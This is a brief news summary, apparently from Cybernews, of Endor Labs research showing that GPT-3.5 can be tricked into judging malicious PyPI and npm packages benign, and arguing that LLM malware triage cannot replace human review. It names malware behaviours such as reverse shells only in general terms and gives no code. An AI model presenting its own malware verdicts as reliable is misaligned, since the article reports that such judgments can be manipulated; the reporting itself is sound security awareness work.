"GPT Tricked by Analysts Into Believing Malware Is Benign"

Researchers have emphasized that Large Language Model (LLM)-driven malware assessments should not be used in place of human analysis because the Artificial Intelligence (AI) technology underlying them can be deceived and manipulated. They have warned that the prevalence of malicious packages in repositories such as PyPI and npm continues to rise. Researchers from Endor Labs stated that the creation of fake accounts and the distribution of malicious packages can be automated to such an extent that the marginal costs of creating and spreading a malicious package are close to zero. Therefore, the company conducted an experiment and helped identify malicious packages by using a combination of AI techniques and examining the source code and metadata of packages. Researchers explained that the source code is examined for the presence of typical malware behaviors such as droppers, reverse shells, and information exfiltration. GPT-3.5 was queried for 1,874 artifacts. Although LLMs can be beneficial in day-to-day operations, Endor Labs has determined that they cannot replace human review. This article continues to discuss GPT being tricked into believing malware is benign. 

Cybernews reports "GPT Tricked by Analysts Into Believing Malware Is Benign"

Submitted by Anonymous on